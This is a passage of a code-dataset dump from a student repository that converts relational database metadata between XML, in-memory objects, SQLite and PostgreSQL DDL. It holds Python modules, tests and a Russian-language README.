создания индекса в БД.\n\n :param index: объект индекса.\n :param table: объект таблицы.\n :param schema: объект схемы.\n :return: str\n \"\"\"\n details = []\n for det in index.details:\n detail = r'\"' + det.value + r'\"'\n if det.expression:\n detail += ' (' + det.expression + ')'\n if not det.descend:\n detail += ' ASC'\n else:\n detail += det.descend.upper()\n details.append(detail)\n\n if len(details) == 0:\n return ''\n\n return string.Template(self.templates.get('index'))\\\n .substitute(\n index_name='\"' + index.name + table.name + '\"' if index.name else '',\n table_name=table.name,\n schema_name=schema.name,\n fields=', '.join(details)\n )\n\n def _get_postgres_type(self, domain):\n \"\"\" Получить строку, представляющую тип домена представления метаданны в ОП.\n\n :param domain: объект домена.\n :return: str\n \"\"\"\n if domain.type.upper() in ['STRING', 'MEMO', 'SYSNAME', 'NVARCHAR', 'VARCHAR']:\n if domain.char_length and int(domain.char_length) > 0:\n return string.Template(self.templates.get('domain_type'))\\\n .substitute(\n type_name='varchar',\n props=domain.char_length\n )\n else:\n return 'varchar'\n elif domain.type.upper() in ['UNIQUEIDENTIFIER', 'MONEY', 'SQL_VARIANT', 'BIT']:\n return 'varchar(200)'\n elif domain.type.upper() in ['NTEXT', 'NCHAR', 'CHAR', 'BLOB', 'VARBINARY', 'BINARY', 'IMAGE']:\n return 'text'\n elif domain.type.upper() == 'BOOLEAN':\n return 'BOOLEAN'\n elif domain.type.upper() == 'DATE':\n return 'date'\n elif domain.type.upper() == 'TIME':\n return 'time'\n elif domain.type.upper() in ['LARGEINT', 'CODE', 'BIGINT']:\n return 'bigint'\n elif domain.type.upper() in ['WORD', 'BYTE', 'SMALLINT', 'INT', 'TINYINT']:\n return 'INTEGER'\n elif domain.type.upper() in ['FLOAT', 'REAL']:\n return 'REAL'\n elif domain.type.upper() in ['DATETIME']:\n return 'timestamp'\n print(domain.type.upper())\n return ''\n"
},
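The generator defers all SQL text to `ddl_templates.cfg`; a small standalone illustration of the `string.Template` mechanism it relies on (the template string below is an assumption for illustration, not the real file content):

```python
import string

# Hypothetical table template in the spirit of the ones the generator
# loads from ddl_templates.cfg; $-placeholders are filled by substitute().
template = string.Template(
    'CREATE TABLE ${schema_name}."${table_name}" (\n$fields\n);'
)
ddl = template.substitute(
    schema_name='dbo',
    table_name='EMPLOYEE_SALARY',
    fields=' "Name" varchar\n,"Salary" dbo."Salary"',
)
print(ddl)
```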
{
"alpha_fraction": 0.665181040763855,
"alphanum_fraction": 0.6674094796180725,
"avg_line_length": 34.19607925415039,
"blob_id": "9154968230da9d86be48cd92037b0a65d67b30ff",
"content_id": "e873bccf00c0d0a23d41fbbade6f948fc81866d1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2418,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 51,
"path": "/_test/test_xml_ram.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "\"\"\" Тестовый модуль, реализующий последовательный запуск создания представления базы в RAM и выгрузки данного\nпредставления назад в XML. При этом производится сверка результата выгрузки с исходным файлом.\n\"\"\"\n\nfrom codecs import open as _open\n\nfrom ram_repr.ram_to_xml import write\nfrom xml_repr.xml_to_ram import read\n\n\ndef compare(source, result):\n \"\"\" Построчно сравнить файлы, игнорируя незначащие отступы.\n\n :param source: путь к исходному файлу.\n :param result: путь к результирующему файлу.\n :return: признак равенства файлов.\n \"\"\"\n with _open(result, 'r', 'utf8') as source_file, \\\n _open(source, 'r', 'utf8') as result_file:\n equal = True\n for source_line in source_file:\n result_line = result_file.readline()\n if source_line.split() != result_line.split():\n print('Расхождение:')\n print(source_line)\n print(result_line)\n equal = False\n return equal\n\n\ndef execute(input, output):\n \"\"\" Запустить созадние объектного представления базы и его выгрузку в файл с последующим сравнением.\n\n :param input: исходный файл с представлением базы в XML.\n :param output: путь к файлу, в который необходимо произвести выгрузку.\n :return: None\n \"\"\"\n schemas = read(input)\n for schema in schemas:\n write(schema, output)\n if compare(input, output):\n print('Файлы успешно прошли проверку на идентичность.')\n else:\n print('Файлы не прошли проверку на идентичность.')\n\n\nexecute('C:\\\\Studying\\\\Коллективная разработка ПО\\\\tasks.xml',\n 'C:\\\\Studying\\\\Коллективная разработка ПО\\\\tasks1.xml')\n\nexecute('C:\\\\Studying\\\\Коллективная разработка ПО\\\\prjadm.xml',\n 'C:\\\\Studying\\\\Коллективная разработка ПО\\\\prjadm1.xml')\n"
},
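The comparison rule above is worth spelling out: two lines are considered equal when their whitespace-split token lists match, so indentation and spacing differences do not fail the check.

```python
# Demonstration of the str.split() equality used by compare(): leading
# and inner whitespace differ, but the token sequences are identical.
line_a = '  <domain name="Salary" type="STRING"/>\n'
line_b = '<domain   name="Salary"  type="STRING"/>\n'
print(line_a.split() == line_b.split())  # True
```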
{
"alpha_fraction": 0.44484731554985046,
"alphanum_fraction": 0.4454198479652405,
"avg_line_length": 49.38461685180664,
"blob_id": "0a5ecad814eb0a04bfbfb6217f49170ea10775b8",
"content_id": "c4597589f54ebe401ab243f5f5c0826417f2760c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5310,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 104,
"path": "/dbd_repr/dbd_temp_structure.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "from __future__ import unicode_literals\n\nCURRENT_DBD_VERSION = '3.1'\n\nSQL_DBD_PRE_INIT = \"\"\"\\\n CREATE TEMPORARY TABLE schemas (\n name VARCHAR UNIQUE NOT NULL\n ,fulltext_engine VARCHAR NULL\n ,version VARCHAR NULL\n ,description VARCHAR NULL\n );\n\"\"\"\n\nSQL_DBD_DOMAINS_TABLE_INIT = \"\"\"\n CREATE TEMPORARY TABLE domains (\n name VARCHAR UNIQUE DEFAULT(NULL) NULL\n ,description VARCHAR DEFAULT(NULL) NULL\n ,data_type_name VARCHAR NOT NULL \n ,length INTEGER DEFAULT(NULL) NULL\n ,char_length INTEGER DEFAULT(NULL) NULL\n ,precision INTEGER DEFAULT(NULL) NULL\n ,scale INTEGER DEFAULT(NULL) NULL\n ,width INTEGER DEFAULT(NULL) NULL\n ,align CHAR DEFAULT(NULL) NULL\n ,show_null BOOLEAN DEFAULT(NULL) NULL\n ,show_lead_nulls BOOLEAN DEFAULT(NULL) NULL\n ,thousands_separator BOOLEAN DEFAULT(NULL) NULL\n ,summable BOOLEAN DEFAULT(NULL) NULL\n ,case_sensitive BOOLEAN DEFAULT(NULL) NULL\n ,uuid VARCHAR UNIQUE NOT NULL\n );\n\"\"\"\n\nSQL_DBD_TABLES_TABLE_INIT = \"\"\"\n CREATE TEMPORARY TABLE tables (\n schema_name VARCHAR NOT NULL \n ,name VARCHAR UNIQUE NOT NULL \n ,description VARCHAR DEFAULT(NULL) NULL \n ,can_add BOOLEAN DEFAULT(NULL) NULL \n ,can_edit BOOLEAN DEFAULT(NULL) NULL \n ,can_delete BOOLEAN DEFAULT(NULL) NULL \n ,temporal_mode VARCHAR DEFAULT(NULL) NULL \n ,means VARCHAR DEFAULT(NULL) NULL \n ,uuid VARCHAR UNIQUE NOT NULL\n );\n\"\"\"\n\nSQL_DBD_TABLES_INIT = \"\"\"\n CREATE TEMPORARY TABLE fields (\n table_name VARCHAR NOT NULL \n ,position INTEGER NOT NULL \n ,name VARCHAR NOT NULL \n ,russian_short_name VARCHAR NOT NULL \n ,description VARCHAR DEFAULT(NULL) NULL \n ,domain_name VARCHAR NOT NULL \n ,can_input BOOLEAN DEFAULT(NULL) NULL \n ,can_edit BOOLEAN DEFAULT(NULL) NULL \n ,show_in_grid BOOLEAN DEFAULT(NULL) NULL \n ,show_in_details BOOLEAN DEFAULT(NULL) NULL\n ,is_mean BOOLEAN DEFAULT(NULL) NULL \n ,autocalculated BOOLEAN DEFAULT(NULL) NULL \n ,required BOOLEAN DEFAULT(NULL) NULL \n ,uuid VARCHAR UNIQUE NOT NULL\n );\n\n CREATE TEMPORARY TABLE constraints (\n id INTEGER NOT NULL -- Синтетический временный идентификатор.\n ,table_name VARCHAR NOT NULL \n ,name VARCHAR DEFAULT(NULL) NULL \n ,constraint_type CHAR DEFAULT(NULL) NULL \n ,reference VARCHAR DEFAULT(NULL) NULL \n ,unique_key_name VARCHAR DEFAULT(NULL) NULL \n ,has_value_edit BOOLEAN DEFAULT(NULL) NULL \n ,cascading_delete BOOLEAN DEFAULT(NULL) NULL \n ,expression VARCHAR DEFAULT(NULL) NULL\n ,uuid VARCHAR UNIQUE NOT NULL\n );\n\n CREATE TEMPORARY TABLE constraint_details (\n constraint_id INTEGER NOT NULL \n ,position INTEGER NOT NULL \n ,field_name VARCHAR NOT NULL\n );\n\n CREATE TEMPORARY TABLE indices (\n id INTEGER NOT NULL -- Синтетический временный идентификатор.\n ,table_name VARCHAR NOT NULL \n ,name VARCHAR DEFAULT(NULL) NULL \n ,local BOOLEAN DEFAULT(0) NOT NULL \n ,kind CHAR DEFAULT(NULL) NULL \n ,uuid VARCHAR UNIQUE NOT NULL\n );\n\n CREATE TEMPORARY TABLE index_details (\n index_id INTEGER NOT NULL \n ,position INTEGER NOT NULL \n ,field_name VARCHAR DEFAULT(NULL) NULL \n ,expression VARCHAR DEFAULT(NULL) NULL \n ,descend BOOLEAN DEFAULT(NULL) NULL \n );\n\"\"\"\n\nSQL_TMP_INIT = SQL_DBD_PRE_INIT + SQL_DBD_DOMAINS_TABLE_INIT + \\\n SQL_DBD_TABLES_TABLE_INIT + SQL_DBD_TABLES_INIT\n"
},
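These staging tables are `TEMPORARY`, so they exist only for the lifetime of the connection that ran `SQL_TMP_INIT`; a quick sketch of that behaviour (assuming the module is importable as `dbd_repr.dbd_temp_structure`):

```python
# The staging tables live in the connection's temp schema and disappear
# when the connection closes, which is why the uploader keeps a single
# connection open for the whole transfer.
import sqlite3

from dbd_repr.dbd_temp_structure import SQL_TMP_INIT

conn = sqlite3.connect(':memory:')
conn.executescript(SQL_TMP_INIT)
conn.execute("INSERT INTO schemas (name) VALUES ('dbo')")
print(conn.execute('SELECT name FROM schemas').fetchall())  # [('dbo',)]
conn.close()  # the temporary tables vanish with the connection
```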
{
"alpha_fraction": 0.8266666531562805,
"alphanum_fraction": 0.8266666531562805,
"avg_line_length": 29,
"blob_id": "9cb87d935d77699f5dcf68fb3d579b92b4d72f88",
"content_id": "23c6513ef34032332f3c5984de450b160a4d3b91",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 150,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 5,
"path": "/_test/test_replication.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "from db_replication.replication import Replicator\n\nreplicator = Replicator('Northwind')\nreplicator.create_empty_database()\nreplicator.transfer_data()\n"
},
{
"alpha_fraction": 0.7284768223762512,
"alphanum_fraction": 0.743929386138916,
"avg_line_length": 25.647058486938477,
"blob_id": "32c8d314a5edd55f774d7e30d3c048a6cc85dab3",
"content_id": "f30e81abf86e1413a1a49472d68f934b037fc676",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 577,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 17,
"path": "/create_xml_for_db.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "import sys\n\nimport dbd_repr.dbd_to_ram as dbd2ram\nimport ram_repr.ram_to_xml as ram2xml\n\nif len(sys.argv) != 2:\n raise KeyError('Ожидается 1 параметр: путь для создания XML представления.')\n\nxml = sys.argv[0]\n\nprint('Создание выгрузка метаданных и БД...')\nschemas = dbd2ram.load(queries='dbd_queries_sqlite.cfg', db_config='database.cfg')\n\nprint('Создание XML представления метаданных...')\nram2xml.write(schemas, xml)\n\nprint('Выполнение завершено.')\n"
},
{
"alpha_fraction": 0.8209649920463562,
"alphanum_fraction": 0.8236590623855591,
"avg_line_length": 101.0999984741211,
"blob_id": "ec2293f351e31d4a3b2b848bb216d55c8b6a59e2",
"content_id": "5029ef656177244eb248c817b886ddf56b88e9fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 7094,
"license_type": "no_license",
"max_line_length": 173,
"num_lines": 40,
"path": "/README.md",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "# collective-development\nRepository contains implementations of cours tasks by Daniil Lukinov.\nЧто реализовано:\n1. Реализовано преобразование текстового представления базы в представление в RAM:\n * реализованы классы, моделирующие элементы базы (модуль ram_structure)\n * реализован модуль, позволяющий произвести разбор текстового представления в объектное (модуль xml_to_ra,)\n * реализованы методы валидации (проверки корректности данных) элементов объектного представления (модуль ram_validation)\n * реализован каскадный проброс ошибок, позволяющий получить больше информации о местоположении неверно заданных элементов\n * реализованы преобразование и загрузка структурированных индексов и ограничений по средствам создания деталей\n2. Реализовано преобразование объектного представления базы в текстовое:\n * реализован модуль, позволяющий произвести данное преобразование (модуль ram_to_xml)\n3. Реализован модуль для тестового запуска реализованных процедур (XML-RAM), который:\n * выполняет преобразование двух предоставленных тестовых файлом в объектное представление в RAM (модуль test_xml_ram)\n * полученные модели преобразует обратно в текстовое представление XML (модуль test_xml_ram)\n * производит построчную сверку файлов с точностью до межстрочных разделителей и делает заключение об идентичности (модуль test_xml_ram)\n4. Реализван модуль выгрузки RAM-представления в базу SQLite. Таким образом создается DBD-представление схемы (модуль ram_to_dbd)\n * Модуль содержит метод upload, который в качестве параметров получает путь к создаваемому файлу базы данных и список выгружаемых схем.\n * В первую очередь создаются источники в БД для временного и постоянного хранения структурных элементов.\n * Выгрузка производится во временные источники для того, чтобы избежать большого количества обращений к БД по ключу.\n * Производится выгрузка всех данных из переданных объектов во временные источники. Запросы для выгрузки находятся в файле \"dbd_queries.cfg\".\n * Запускается скрипт, переливающий данные из временных источников в постоянные, проставляя все связи.\n5. Реализован модуль загрузки DBD-представления и преобразования в RAM-представление.\n * С использованием скриптов, находящихся в файле \"dbd_queries.cfg\", производится загрузка словарей из базы SQLite.\n * Полученные словари преобразуются в последовательность объектов RAM-представления.\n * Исходя из загруженных из БД идентификаторов проставляются связи между объектами в RAM.\n6. Реализован модуль для тестового запуска реализованных процедур (RAM-DBD), который:\n * Преобразует содержимое файла с XML-представлением в RAM-представление.\n * Полученное представление в ОП преобразует в реляционное (dbd).\n * Выполняет обратный процесс: из реляционного представления преобразует данные в RAM-представление, затем в XML.\n * В конечном итогу производится построчное сравнение результата выгрузки с исходным файлом.\n7. Реализован класс, генерирующий DLL-инструкции. (модуль ddl_genearator)\n * На вход методы класса получают объекты элементов метаданных в объектном представлении.\n * Методы класса производят формирование DLL-инструкций для создания элементов в БД PostgreSQL.\n * На выходе методов - готова DLL-инструкция, готовая к выполнению.\n8. Реализован класс, представляющий собой подключение к серверу Postgres, способный генерировать пустую БД по реляционному или текстовому представлению. 
(модуль dll_aplying)\n * При инициализации классу передается путь к config-файлу с параметрами подключения.\n * Соответствующие методы класса производят генерацию элемента в БД, получая на вход объект в объектном представлении.\n * Метод deploy, получающий на вход имя генерируемой БД и путь к файлу с одним из заданных представлений метаданных, создает и генерирует структуру, исходя из метаданных.\n9. Начата реализация unit-теста для проверки класса DllGenerator, но разработка прекращена в связи с проблемамы сравнения многострочных переменных.\n10. Реализован мини-модуль (test_ddl_applying), производящий запуск генерации пустой БД из двух представлений: реляционного и текстового. Базы успешно формируются."
},
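For reference, a deployment run corresponding to items 7-8, modelled directly on `test_ddl_applying.py` (the config paths, database name, and DBD file are placeholders):

```python
from db_deploy.ddl_applying import DbCreationConnection

# Connection parameters come from database.cfg, SQL helpers from the
# queries config; deploy() accepts either a .db (DBD) or .xml source.
db = DbCreationConnection('database.cfg', 'dbd_queries_sqlite.cfg')
db.deploy(db_name='Collective', repr_file='dbd_repr.db')
```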
{
"alpha_fraction": 0.5905345678329468,
"alphanum_fraction": 0.5909300446510315,
"avg_line_length": 30.345041275024414,
"blob_id": "8fa00d4ca314b9005a744638570b8f75bc52b45f",
"content_id": "5d0d7646811ba04086ee530a3e8476c2d1434551",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16578,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 484,
"path": "/dbd_repr/dbd_to_ram.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "import configparser\nimport pyodbc\nimport sqlite3\n\nfrom ram_repr.ram_structure import Constraint\nfrom ram_repr.ram_structure import ConstraintDetail\nfrom ram_repr.ram_structure import Domain\nfrom ram_repr.ram_structure import Field\nfrom ram_repr.ram_structure import Index\nfrom ram_repr.ram_structure import IndexDetail\nfrom ram_repr.ram_structure import Schema\nfrom ram_repr.ram_structure import Table\n\n\nclass DbdDownloadConnection:\n \"\"\" Класс, реализующий подключеине к базе для загрузки данных из источников структурных\n элементов в виде словарей.\n \"\"\"\n def __init__(self, queries_config: str, db_file=None, db_config=None):\n self.queries = configparser.ConfigParser()\n self.queries.read(queries_config, 'utf-8')\n if db_file:\n self.conn = sqlite3.connect(db_file)\n elif db_config:\n config = configparser.ConfigParser()\n config.read(db_config, 'utf-8')\n server = config.get('SERVER', 'mssql_server')\n self.conn = pyodbc.connect(server)\n else:\n raise KeyError('Необходимо задать хотя бы одно из: файл БД; файл с параментрами БД.')\n self.cursor = self.conn.cursor()\n\n def __exit__(self):\n self.conn.close()\n\n def _get_result(self):\n \"\"\" Получить результат последнего выполненного запроса в виде словаря.\n\n :return: dict\n \"\"\"\n columns = [column[0] for column in self.cursor.description]\n results = []\n for row in self.cursor.fetchall():\n results.append(dict(zip(columns, row)))\n return results\n\n def load_schemas(self):\n \"\"\" Загрузить словари схем.\n\n :return: dict\n \"\"\"\n query = self.queries.get('DOWNLOADING', 'schema')\n self.cursor.execute(query)\n return self._get_result()\n\n def load_domains(self):\n \"\"\" Загрузить словари доменов.\n\n :return: dict\n \"\"\"\n query = self.queries.get('DOWNLOADING', 'domain')\n self.cursor.execute(query)\n return self._get_result()\n\n def load_tables(self):\n \"\"\" Загрузить словари таблиц.\n\n :return: dict\n \"\"\"\n query = self.queries.get('DOWNLOADING', 'table')\n self.cursor.execute(query)\n return self._get_result()\n\n def load_fields(self):\n query = self.queries.get('DOWNLOADING', 'field')\n self.cursor.execute(query)\n return self._get_result()\n\n def load_constraints(self):\n \"\"\" Загрузить словари ограничений.\n\n :return: dict\n \"\"\"\n query = self.queries.get('DOWNLOADING', 'constraint')\n self.cursor.execute(query)\n return self._get_result()\n\n def load_index(self):\n \"\"\" Загрузить словари индексов.\n\n :return: dict\n \"\"\"\n query = self.queries.get('DOWNLOADING', 'index')\n self.cursor.execute(query)\n return self._get_result()\n\n def load_constraint_details(self):\n \"\"\" Загрузить словари деталей ограничений.\n\n :return: dict\n \"\"\"\n query = self.queries.get('DOWNLOADING', 'constraint_detail')\n self.cursor.execute(query)\n return self._get_result()\n\n def load_index_details(self):\n \"\"\" Загрузить словари деталей индексов.\n\n :return: dict\n \"\"\"\n query = self.queries.get('DOWNLOADING', 'index_detail')\n self.cursor.execute(query)\n return self._get_result()\n\n\ndef load(queries: str, db_file: str=None, db_config: str=None):\n \"\"\" Создать RAM-представление схемы базы посредствам загрузки струтурных компонентов из базы,\n получаемой из файла, путь к которому передается в качестве параметра.\n\n :param queries: путь к файлу с параметрами подключения и запросами.\n :param db_file: путь к файлу базы данных\n :return: listW\n \"\"\"\n conn = DbdDownloadConnection(queries, db_file, db_config)\n\n schemas = {}\n for schema_row in conn.load_schemas():\n 
schema, schema_id = _create_schema(schema_row)\n schemas[schema_id] = schema\n\n tables = {}\n for table_row in conn.load_tables():\n table, table_id, schema_id = _create_table(table_row)\n tables[table_id] = table\n schemas[schema_id].tables[table.name] = table\n\n domains = {}\n for domain_row in conn.load_domains():\n domain, domain_id = _create_domain(domain_row)\n domains[domain_id] = domain\n for schema in [schema for schema in schemas.values() if len(schema.tables) > 0]:\n schema.domains[domain.name] = domain\n\n fields = {}\n for field_row in conn.load_fields():\n field, field_id, table_id = _create_field(field_row)\n if table_id not in tables:\n continue\n tables[table_id].fields[field.name] = field\n fields[field_id] = field\n\n constraints = {}\n for constraint_row in conn.load_constraints():\n constraint, constraint_id, table_id = _create_constraint(constraint_row)\n if table_id not in tables:\n continue\n tables[table_id].constraints.append(constraint)\n constraints[constraint_id] = constraint\n\n indices = {}\n for index_row in conn.load_index():\n index, index_id, table_id = _create_index(index_row)\n if table_id not in tables:\n continue\n tables[table_id].indexes.append(index)\n indices[index_id] = index\n\n constraint_details = {}\n for detail_row in conn.load_constraint_details():\n detail, detail_id, constraint_id = _create_constraint_detail(detail_row)\n constraints[constraint_id].details.append(detail)\n constraint_details[detail_id] = detail\n\n index_details = {}\n for detail_row in conn.load_index_details():\n detail, detail_id, index_id = _create_index_detail(detail_row)\n if index_id not in indices:\n continue\n indices[index_id].details.append(detail)\n index_details[detail_id] = detail\n\n return schemas.values()\n\n\ndef _create_schema(attr_dict):\n \"\"\" Создать объект Схемы, опредлить его поля.\n\n :param attr_dict: Словарь свойств из dbd-представления.\n :return: объект Схемы.\n \"\"\"\n schema = Schema()\n\n schema_id = None\n\n for attr in attr_dict:\n if attr == 'name':\n schema.name = attr_dict[attr]\n elif attr == 'fulltext_engine':\n schema.fulltext_engine = attr_dict[attr]\n elif attr == 'version':\n schema.version = attr_dict[attr]\n elif attr == 'description':\n schema.description = attr_dict[attr]\n elif attr == 'id':\n schema_id = attr_dict[attr]\n else:\n raise UnsupportedAttributeError(attr)\n return schema, schema_id\n\n\ndef _create_domain(attr_dict):\n \"\"\" Создать объект Домена, опредлить его поля.\n\n :param attr_dict: Словарь свойств из dbd-представления.\n :return: объект Домена.\n \"\"\"\n domain = Domain()\n\n domain_id = None\n\n for attr in attr_dict:\n if attr == 'name':\n domain.name = attr_dict[attr]\n elif attr == 'data_type_name':\n domain.type = attr_dict[attr]\n elif attr == 'align':\n domain.align = attr_dict[attr]\n elif attr == 'width':\n domain.width = attr_dict[attr]\n elif attr == 'char_length':\n domain.char_length = attr_dict[attr]\n elif attr == 'description':\n domain.description = attr_dict[attr]\n elif attr == 'length':\n domain.length = attr_dict[attr]\n elif attr == 'scale':\n domain.scale = attr_dict[attr]\n elif attr == 'precision':\n domain.precision = attr_dict[attr]\n elif attr == 'case_sensitive':\n domain.case_sensitive = attr_dict[attr]\n elif attr == 'show_null':\n domain.show_null = attr_dict[attr]\n elif attr == 'show_lead_nulls':\n domain.show_lead_nulls = attr_dict[attr]\n elif attr == 'thousands_separator':\n domain.thousands_separator = attr_dict[attr]\n elif attr == 'summable':\n 
domain.summable = attr_dict[attr]\n elif attr == 'id':\n domain_id = attr_dict[attr]\n else:\n raise UnsupportedAttributeError(attr)\n return domain, domain_id\n\n\ndef _create_table(attr_dict):\n \"\"\" Создать объект Таблицы, опредлить его поля.\n\n :param attr_dict: Словарь свойств из dbd-представления.\n :return: объект Таблицы.\n \"\"\"\n table = Table()\n\n table_id = None\n schema_id = None\n\n for attr in attr_dict:\n if attr == 'name':\n table.name = attr_dict[attr]\n elif attr == 'description':\n table.description = attr_dict[attr]\n elif attr == 'temporal_mode':\n table.ht_table_flags = attr_dict[attr]\n elif attr == 'access_level':\n table.access_level = attr_dict[attr]\n elif attr == 'can_add':\n table.add = attr_dict[attr]\n elif attr == 'can_edit':\n table.edit = attr_dict[attr]\n elif attr == 'can_delete':\n table.delete = attr_dict[attr]\n elif attr == 'means':\n table.means = attr_dict[attr]\n elif attr == 'schema_id':\n schema_id = attr_dict[attr]\n elif attr == 'id':\n table_id = attr_dict[attr]\n else:\n raise UnsupportedAttributeError(attr)\n return table, table_id, schema_id\n\n\ndef _create_field(attr_dict):\n \"\"\" Создать объект Поля, опредлить его поля.\n\n :param attr_dict: Словарь свойств из dbd-представления.\n :return: объект Поля.\n \"\"\"\n field = Field()\n\n field_id = None\n table_id = None\n\n for attr in attr_dict:\n if attr == 'name':\n field.name = attr_dict[attr]\n elif attr == 'russian_short_name':\n field.rname = attr_dict[attr]\n elif attr == 'domain_name':\n field.domain = attr_dict[attr]\n elif attr == 'type':\n field.type = attr_dict[attr]\n elif attr == 'description':\n field.description = attr_dict[attr]\n elif attr == 'can_input':\n field.input = attr_dict[attr]\n elif attr == 'can_edit':\n field.edit = attr_dict[attr]\n elif attr == 'show_in_grid':\n field.show_in_grid = attr_dict[attr]\n elif attr == 'show_in_details':\n field.show_in_details = attr_dict[attr]\n elif attr == 'is_mean':\n field.is_mean = attr_dict[attr]\n elif attr == 'autocalculated':\n field.autocalculated = attr_dict[attr]\n elif attr == 'required':\n field.required = attr_dict[attr]\n elif attr == 'id':\n field_id = attr_dict[attr]\n elif attr == 'table_id':\n table_id = attr_dict[attr]\n else:\n raise UnsupportedAttributeError(attr)\n return field, field_id, table_id\n\n\ndef _create_constraint(attr_dict):\n \"\"\" Создать объект Ограничения, опредлить его поля.\n\n :param attr_dict: Словарь свойств из dbd-представления.\n :return: объект Ограничения.\n \"\"\"\n constraint = Constraint()\n\n if attr_dict is None:\n return constraint\n\n constraint_id = None\n table_id = None\n\n for attr in attr_dict:\n if attr == 'name':\n constraint.name = attr_dict[attr]\n elif attr == 'constraint_type':\n constraint.kind = attr_dict[attr]\n elif attr == 'items':\n detail = ConstraintDetail()\n detail.value = attr_dict[attr]\n constraint.details.append(detail)\n elif attr == 'reference':\n constraint.reference = attr_dict[attr]\n elif attr == 'unique_key_id':\n constraint.constraint = attr_dict[attr]\n elif attr == 'expression':\n constraint.expression = attr_dict[attr]\n elif attr == 'has_value_edit':\n constraint.has_value_edit = attr_dict[attr]\n elif attr == 'cascading_delete':\n constraint.cascading_delete = attr_dict[attr]\n elif attr == 'id':\n constraint_id = attr_dict[attr]\n elif attr == 'table_id':\n table_id = attr_dict[attr]\n else:\n raise UnsupportedAttributeError(attr)\n return constraint, constraint_id, table_id\n\n\ndef _create_index(attr_dict):\n \"\"\" Создать 
объект Индекса, опредлить его поля.\n\n :param attr_dict: Словарь свойств из dbd-представления.\n :return: объект Индекса.\n \"\"\"\n index = Index()\n\n if attr_dict is None:\n return index\n\n index_id = None\n table_id = None\n\n for attr in attr_dict:\n if attr == 'name':\n index.name = attr_dict[attr]\n elif attr == 'field':\n detail = IndexDetail()\n detail.value = attr_dict[attr]\n index.details.append(detail)\n elif attr == 'kind':\n index.kind = attr_dict[attr]\n elif attr == 'local':\n index.local = attr_dict[attr]\n elif attr == 'uniqueness':\n index.uniqueness = attr_dict[attr]\n elif attr == 'fulltext':\n index.fulltext = attr_dict[attr]\n elif attr == 'id':\n index_id = attr_dict[attr]\n elif attr == 'table_id':\n table_id = attr_dict[attr]\n else:\n raise UnsupportedAttributeError(attr)\n return index, index_id, table_id\n\n\ndef _create_constraint_detail(attr_dict):\n \"\"\" Создать объект Детали ограничения, опредлить его поля.\n\n :param attr_dict: Словарь свойств из dbd-представления.\n :return: объект Детали ограничения.\n \"\"\"\n detail = ConstraintDetail()\n\n detail_id = None\n constraint_id = None\n\n for attr in attr_dict:\n if attr == 'field_name':\n detail.value = attr_dict[attr]\n elif attr == 'id':\n detail_id = attr_dict[attr]\n elif attr == 'constraint_id':\n constraint_id = attr_dict[attr]\n else:\n raise UnsupportedAttributeError(attr)\n return detail, detail_id, constraint_id\n\n\ndef _create_index_detail(attr_dict):\n \"\"\" Создать объект Детали индекса, опредлить его поля.\n\n :param attr_dict: Словарь свойств из dbd-представления.\n :return: объект Детали индекса.\n \"\"\"\n detail = IndexDetail()\n\n detail_id = None\n index_id = None\n\n for attr in attr_dict:\n if attr == 'field_name':\n detail.value = attr_dict[attr]\n elif attr == 'expression':\n detail.expression = attr_dict[attr]\n elif attr == 'descend':\n detail.descend = attr_dict[attr]\n elif attr == 'id':\n detail_id = attr_dict[attr]\n elif attr == 'index_id':\n index_id = attr_dict[attr]\n else:\n raise UnsupportedAttributeError(attr)\n return detail, detail_id, index_id\n\n\nclass ParseError(Exception):\n \"\"\" Подкласс исключений, порождаемых в процессе парсинга DBD-представления\n схемы БД.\n \"\"\"\n pass\n\n\nclass UnsupportedAttributeError(ParseError):\n \"\"\" Подкласс исключений, порождаемых при обнаружении неподдерживаемого\n атрибута в DBD-представлении БД.\n \"\"\"\n def __init__(self, attribute):\n self.attribute = attribute\n\n def __str__(self):\n return 'Неподдерживаемый атрибут \\\"' + self.attribute + '\\\"'\n"
},
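A sketch of the two supported loading modes, mirroring the CLI scripts in this repository (file paths are placeholders):

```python
from dbd_repr.dbd_to_ram import load

# Mode 1: read the DBD representation from a SQLite file.
schemas = load('dbd_queries_sqlite.cfg', db_file='dbd_repr.db')

# Mode 2: read metadata from a live server described in database.cfg
# (the mssql_server connection string is taken from its SERVER section).
schemas = load('dbd_queries_sqlite.cfg', db_config='database.cfg')
```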
{
"alpha_fraction": 0.7053364515304565,
"alphanum_fraction": 0.7238979339599609,
"avg_line_length": 22.94444465637207,
"blob_id": "9374326cc395ca194e8ea428ef5f067d9c5fe295",
"content_id": "5478838b4fbcbb89bbb15723fd51cda37974c1be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 536,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 18,
"path": "/convert_dbd_to_xml.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
